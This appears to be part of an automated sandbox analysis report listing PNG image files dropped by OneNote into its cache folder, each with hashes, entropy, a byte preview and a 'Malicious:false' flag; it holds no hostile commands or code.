                                                                                                                                                    SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......\......!2a....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]iPTW..iv..D.....%DQ#A$...d..h,.T~..+...TM\cj*.)k.fj~L~$...L&...,...:.FdU..f_......._.n.m.....q.s.9.=..w.9......$..b.*..%....@A]A..%..<......l.h.+../..OSe.....]...>..C........^cCy.0nz.4<......g..?~..>.1ws.B....07W65.74T....=..v.......D....6.....tR....}]}....4z..^....7..;.."......^.....|=.#.=.32..o.<.Tn*Q....g.zN...n*...!/.........!....F..]...6...m...CX..~...+..U...E.|.........7]=rE?i(..$`e.%.`.....w._.Y...l.1...@....t.P..=.}..*...N...N.|.xS.5&.....Pe......Z.Z^XJkx.....^.....?7..._....Wsz......}G..]...\.....,[.y....}.J....'.R?a...G5..l.i.?....MH..l.DC^._.c.m.....%{;z.&.*+x;...S.....zxyH..`.._]...el^........U.T..^..p..z[.6(2x..,#;o##..}Zv|Z..............V.....0}Z....]..m.....x..).k]&e.._.W!Vry..%...I..d..}w.....^..\............m[.^.3r.......-8......j....>...Q..T..{\V\ptH.?........1..w....FHl...x.....\.`.ei.w..)`...g..V{..Z.....8..........o.._..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002D.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2599
                                                                                                                                                    Entropy (8bit):7.903700862190034
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                    MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                    SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                    SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                    SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......M.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.]kl.U....B|E..>...*..Q........b[.K........m.(..... ...!%1%*-B.C~(&`[.....-.....~.w3..Kw.3wvfzn.2{..s.....{w..\....!.3..:..!..../..zD.x...O.K... ^.1*...8.G...z...D.$...........>!..V..`v.CQQQ!..-L...../3.2......ZH.?s...Iu\N..,3.?.p..N......<....E.<.=z..Iu<ll.dX...g....+.{X.p.....:..t...a...cKK.|...Yszl.N.:......KPs.):).T.5...&B...*..5j``@...(_r.V.j..m...?x.sg...t\.dz.'^.=.\.h..<.y....:.I...w..ze.m.\.qPJu.....D.|..@......W..t.+.....X....e....\H+.Ns%^r.VS.N.3:...&...._..#^....d! ..F.....xc..M...q...17.z...z&C...K9(.Ifm.35.v.>.'X,...p.:=.H...J.K.,...:~...7.t.....R..R..9..?....l../.(...0z0.M.f.)H..Y_"e......B........L...q.K......|;..L.........xI.K3.M..%........./..){....R....s...7....).q.._R.4O.a3......<..%....3#.|>..y...u...R'.P..$Klz...........,...g.....`.7..\...x>.{p\;>+.,.....e.-..Re@.N..FY_....*....]}...[..h.M.oq.S.U...c_}`......8TP....

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002E.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1570
                                                                                                                                                    Entropy (8bit):7.780157858994452
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                    MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                    SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                    SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                    SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......2......n.f....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^.[MK.W...t!.fU..b!....*JBA......%-.F.4$.Nw].....E.$...)T......?@.O{...3w..y.=/"o.9...<.y...X....c.1P6..e.lx....0..J....e3.&\.@)............o.*>.E,;.....~..|....Z.3`K..W0S.&.L._..M.e.`..M.....i_.......\...6g..^....4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..L.Y.9.$M...4..2.......q...&...........*.Qg.+.p.......a.:.X6...o2......A.....[).,.p......P......_..>......3.......z8j............>...fww.6....../....S<......^%.4........{.N$..`.!H....`........a..(.G^>~|txx....K\mF..'d.d:9J!.....j..i24.A...`O.......s.....?={....H'._..~..O......*>...ZXX.3...;C....\....%..s=...w<h.......0....~..y..._.......+.n.P.M]c...A..Er|.R...$.g...9*._.jg.....x...&+.JWM4xe..^....0...11.[.....f....r#.h.h$....[=t >...r....L.0.KL..B\..x........4J.0....vY...\dA. w...........g....};.}.....;.......x.|.....)......x....s....N.$.n..g<Z.q.a9.C.....oX..%,KNNN..i.8J..p].1....B>{......n.D|3t.-\g...Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002F.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4490
                                                                                                                                                    Entropy (8bit):7.928016176674318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                    MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                    SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                    SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                    SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...T...O.....;.......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..p.U..'...rD.WX.... Q.. ....."$.ZHP.Z...C...........R..%G8R..... .R.C6..A.b...0...^...#..g..........z2.....nB...l..X.&._.a,...a,...a,...a,...a,._.73'N..ukeee.6mZ.n.m.G.}...n...a.9s.DGG....y...8??.o.pE1....Y.,......).ca.i.M.:5$$.........Lr...ye........6...8...z.-r....d.(.xc..U..^11...._>.QX..y..2...T...sss1..."A.?_.;w..S.F>......4.G.......D.|...@.K...............C...k...P...q....6.`QQEE................7;;;.._\q.k.|...\.z..6j>..n....Y.&G*.n.S$))).....r........}.{[Dv:,..w..A...`..........a.~.N.f.s...P...*..'7n....eK....+.n;:.W..C..9}..O..D.q..X..5i.s~en.c..F&..?.....l.]3r...W`..#..7o..R.@^..*...W..?}t...{.B.8..D...UPa..~..C...|.C].a.9..R...c.Y0..9.u...d...C.......X.U....WK.....5...'..PM.`...<. ._.z.F^^.EH.K>_.0.d..S...Yj<..~.5.?l.fZ0.@d.....*..G...K.....e...b.|e..Q.4.....('z...!G.....2..XQx\......X...2.\h..X~.e....Z....=....C.1.......w.....d.z.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002G.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):11449
                                                                                                                                                    Entropy (8bit):7.91552812501629
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                    MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                    SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                    SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                    SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..,NIDATx^....E...@^.T.....H..$..(.!..3....O=Q...<.9.`@E...CE.(""..H.$..6.......]3......tW}U...w*~....W./. .. ..........m..H..H... ..........'...G...W.=#.M.$@.$p...........!@=U.VH..H.z.g..H........H+$@.$@=.3@.$@.j.PO.p... ...... .. .5...j8......PO..........o....+.Z.Pb.FH.......D.g\........._..'0.......9.>............&..PO.z..)-..........R....'@=U..I.&.g......../....SO.\.,._.@7Q.g.}V+../..Ht.I=..WZ%.{......_v.....%U.)^H(!!..q....|.H.E.DG_....o../...T.i...z.%.4K..# %.-.(...4J`i..,.P....F.D.zj..#..@.).(...o.....S..)..i.z.g...h..8.......A<d.z....<...n.]...E....(Jj4P;._.N..Q...)..8U.u.e).j.e...E|.]."..t6.[.K..5.6.....B..(.=W./....S'.......z.FY.. ...PO.".tI...F...Q....c.o.....}...r>..3c9I../.......}......I..G.|..|...~.b.e.5.OGb..o.....w....i.e...5&.,Z.H......g..KY.<.nZ.x...HHbdS.Z.\.O..1Q.K...9....Z.L....\g#.._~9###%%.O.>.Rvu..C.....S..g01..j...?-../...Q..N.:._....1.!

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002H.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):7374
                                                                                                                                                    Entropy (8bit):7.955141875077912
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                    MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                    SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                    SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                    SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002I.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):19235
                                                                                                                                                    Entropy (8bit):7.944867159042578
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                    MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                    SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                    SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                    SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002J.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2210
                                                                                                                                                    Entropy (8bit):7.86853667196985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                    MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                    SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                    SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                    SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...;...=.............sRGB.........gAMA......a.....pHYs..........o.d...7IDAThC.yL.w...r..r....... ...Eq.nnN..i..[.e...-.d.M.dn...x.xmQAT.Q.RN9..EA.k..P`..=}..m.&~............oy....k...}}x..[....g59.}]...~i.SY......."....7Ow../......2...3f)n{..R..R......U?......O.{....c..pT.\.t....5.07.. .....07...7.o..,+.,.V.c...&..%.3I.....:v..\....6.....??..[.N...........nz..Z.B.........v.prs.q1V1|..=':..`.bz..%s.cf.3..RyMNUeV..J.k.}D[~xo..d..c...sO.y\....B...c.07......Rp..J.......{b.......;u...s....N.gko.M...;6...6..c.X5.S..o..\....^).....(......y.72.^....s%...[.q!&Z....C-..+o.....I.....,Y.{......g.1.0..I}.....<.....T..}....t.!x&)..[.7....4.5..{....n.<...#I...:.....r.wW~..zr..9k.^.]KR.*W.J.n.")....%0...)...Fbb5`4'.X..E.../.t.&,t(...@9....\$..........].P..jdU......H;.$.'%}.l7........y..$.....Z..4.Cm.u#&.%N..1..+..8....y...U.(.T.....}.I..5r}...!..K....>f..3.C.G..X1.(<.Gb..b(....0Qv0F.......n.z.s.Y......\.,.h%1...QU..%.}B|CW......sO..\.=..&3...,.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002K.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):2232
                                                                                                                                                    Entropy (8bit):7.837610270261933
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                    MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                    SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                    SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                    SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d...MIDATx^..hVU..}..s:..6..9g.MM3...j...*........A..!.A.....R.Ai%YH..(M.".h.cf*.B.......:...{w.{.......y.s>.{.{.=.........#.y..r.K...K.0}......Y..b..[N.=....j.=........!......./.6....B.8....p....5P)....@......=}............^.~..@.o`n<.q.....Yw]..mg\V*...y.W.T.>...\n...s.iG.~L]..d.<.8..j<.<1..4...CZ0...}...........oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..L....5.7""4`..p.........'.kt.....>!\.k.oDDh.....]3}#"B..O........0}B.F.L......5.f.FD..I..x........Z^...>B$1.N"}4.....1:&F8..*.X.yL(..s.3......~2.EL%.w.Uc.zJ...B..S..b.7o|%..7..'.....N.|..Vi...q..uO,`/....\W{..y...&iI..|X&T.........-........Z..o.~u..U....cF.M....O4}......~......:T..W.._s...t..Dlb.$Pr././.._4.b......R.T$t..$.>hB. +.{......m.w .Q...05..C.}...}.....?..h.....Y .8.6^t....}.y.%......l=$..[.~..]..h..N.......*....SB.|....8..H......_...G...|......;6YQ|WO.o.}]..'.$..oE.y...i'9.[cmS..@m@.Q

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002L.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 742 x 104, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):13030
                                                                                                                                                    Entropy (8bit):7.948664903731204
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:/06ULmwT2RqfILhmLy4tNpYGL0mvBQhTMHX4PCIVYm:s6USI2RqfGhmDrpYM0ofHX4aIVYm
                                                                                                                                                    MD5:17E9FF9F735102231846936F0E2BAF1A
                                                                                                                                                    SHA1:9EC1AE8A3AD55C48C02427D842D6E38DA85B5145
                                                                                                                                                    SHA-256:DD1CA8DA90893E0B63ABFDD9E60CF2BF844B311964E9D9DDB855C21FCA156EBB
                                                                                                                                                    SHA-512:71E690D6C87B09659296E6E6DDC8E3F91035DD80C5CE875FA557763E8138900C27FB492885291CEE203D65BCEE8C20C9C39E0590A5FD32B8A00BEB3E3F6D6E8F
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR.......h.....2......sRGB.........gAMA......a.....pHYs..........o.d..2{IDATx^.wp\.....sN$...$.).Q.")R2ei,kl.%....r..vm.x<...\...u.U.g.ry=..uX.cK.dI..I1G..$.".Fg.q...N.nt...3.w.w..~.v.O.....K.....A@.....A ..H.n.D;A@.....A@......e.y ..... ...1..P..xH.. ..... ..e.9 ..... ...1..P..xH.. ..... ..e.9 ..... ...1.@.$9..S....A@..4....^C..F..VR\\TT.........aHII1......VS..g........... .*....z..|Ek.......<R../55+33;;;+..Y..WC..#...P..... ...s#0::......522...,.v..D......_.....9.2N.L.'..F$.....e..!..... ...N...`1....G.....'&,f..f.X....!.lp......I_........J..z.R,YbYd&.... ......~"b\...b.Z.SS.....c....&..Yl-............... ..[...BY......... ... 1..Z..6NN............._.zw....MKK.Z..vMMnnn.4.v....,q..e... .D%....Q......._..p*M......22..e...k.}.....qU....S.a...~....P..}v.. ...1..2...F.GCC#...].=..C..n#...K+..MOO..........."....d^2=.{....U.p.h%.%n...D.....XB..b..'''....?h.b.B\v..^Q^.UC............Q...I.....U.VD...P..{.2"A@...b..V...........jF.x.

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002M.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):14458
                                                                                                                                                    Entropy (8bit):7.944094738048628
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                    MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                    SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                    SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                    SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002N.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):1657
                                                                                                                                                    Entropy (8bit):7.80882577056055
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                    MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                    SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                    SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                    SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                    Malicious:false
                                                                                                                                                    Preview:.PNG........IHDR...{...g.............sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...h.U..p.T..(.eBR....2.....':.4kec^....0.&.....ugS.8u:i.P.F..f3...D....6.%...xaI.}...y..9...s.w.s..{..y.5<<<...(0Q.............t_..q/.[@.....-.e.....=..J.L.......c.4H......u?.XF.KJ..zb..0..f}..'J.,[&..S.6...w..9..._......<.........?j....H........>....~..}.n.8.WW..B?...?.b.;.....<....~...b...m....&1.=.Pq....w....a_3.k7'...\....d..z.O..w...s...Lh.x..........Q;40.i..`.8V._.@...rd.....kF.@<@..e......e....=mHB;....E./.\h.^....q..>.....%v:.O.:...&q...:.'e..9...h.iG'.L<@......([..|'.n.x...c....._O...[)......S*..Q...d......A....4..t....E..v..}..7...t.b....,/*|.H.]...8.. .@.(.;"..Kt.....].+.[LwJ..B]i.b.k.@..Js......J......6..J._LwS<@..J.YLwV<@G.4w.L..G...]..zu.z.h....;...W.IH..+...c...F....qI....Xul..]...N...wv\.M$..D...+...=.....?U....T..^<6../T*.{q.q..:....y..XL..l..z.d....G..b..g.G..b......SM.{q.q$MUL..R..........^\P..g...e.....L/yqM../.b.f..........J.<

                                                                                                                                                    C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\tmp\0000002O.bin

                                                                                                                                                    Download File
                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                    File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):4847
                                                                                                                                                    Entropy (8bit):7.950192613458318
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                    MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                    SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                    SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                    SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                    Malicious:false
